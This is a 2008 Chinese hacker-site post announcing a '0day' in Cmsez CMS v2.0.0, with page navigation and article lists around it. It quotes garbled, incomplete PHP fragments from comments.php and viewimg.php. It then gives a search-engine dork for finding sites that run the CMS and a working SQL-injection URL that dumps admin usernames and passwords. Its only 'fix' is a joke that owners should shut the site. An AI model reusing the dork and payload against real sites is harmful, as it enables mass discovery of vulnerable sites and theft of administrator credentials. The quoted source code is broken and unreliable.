通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 电信网通铁通移动   在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 红客教程 >> 网络攻防 >> 文章正文
Cmsez(随易)全站系统 0day
责任编辑:酷酷の鱼   更新日期:2008-3-17
 
程序名称:Cmsez Web Content Manage System v2.0.0
漏洞发现:小帥(小帅) 
公布时间:08-03-14
漏洞影响:严重
漏洞文件:comments.php viewimg.php
官方站点:http://www.cmsez.com/
漏洞代码:

---------------

<?
//comments
include "mainfile.php";
$art=new article();
//设定
function comment(id)
{
var page = \"".PLUS_URL."/comments.php?id=\" + id ;
popwin = window.open(page,\"\",\"width=460,height=500,scrollbars,resizable\")
popwin.focus();
}
document.open();
document.write(\"<a href=\\\"javascript:comment(’$id’)\\\" title=\\\""._LANG_0930."\\\">"._LANG_0931." $showNum "._LANG_0932."</a>\");
document.close();";
break;
case "saveComment":

--------------
viewimg.php
--------------

<?
//image.php 显示附件的图片
include "mainfile.php";
$user_info[user_level]=="Guest" && $confirm==true){
include "modules/member/index.php";
}else{
sql="select id from $imgdb where aid=$aid order by id ";

---------------------
exp:
allinurl:"owered by CMSEZ" comments.php inurlowered by CMSEZ
http://localhost/comments.php?id=1111111111111/**/union/**/1,concat(name,0x3a,pass),2,3,4/**/from/**/admin/*

-------------------

修复方案:

最好把站关了... 
  • 上一篇文章:
  • 下一篇文章:
  • 最近更新
    固顶文章 Delphi编程培训班开课了
    普通文章 瑞星公司03月17日发布 每日计算机病毒及木马播报
    普通文章 “杀毒”立法成两会热点 安全厂商担重任
    普通文章 应用软件存在漏洞 互联网安全面临强劲挑战
    普通文章 给你加强操作系统安全的十个建议!
    推荐文章 推荐:SA权限下的思路变通
    普通文章 网管员需要注意十点安全技巧
    普通文章 浅谈黑客入侵的四条途径与防护
    普通文章 Cmsez(随易)全站系统 0day
    普通文章 木马生成技术
    热门文章
    普通文章瑞星公司03月07日发布 每日计算机病毒及木马播报
    普通文章浅析:以策略遵从为核心的终端安全
    普通文章如何使用FreeBSD防火墙保护企业网络
    推荐文章推荐:别以为你的电脑很安全(附BS马夫解决方案)
    普通文章从攻击者角度来阐述如何防御黑客攻击
    普通文章企业焦点 主动防御能否保障安全
    普通文章网络四面楚歌 杀毒软件遭遇严峻考验
    普通文章艳照暗藏陷阱 看艳照当心密码被盗
    普通文章微软宣布IE8将全面兼容通用网络标准
    普通文章金山预警:"狂犬病"肆虐互联网
    精彩专题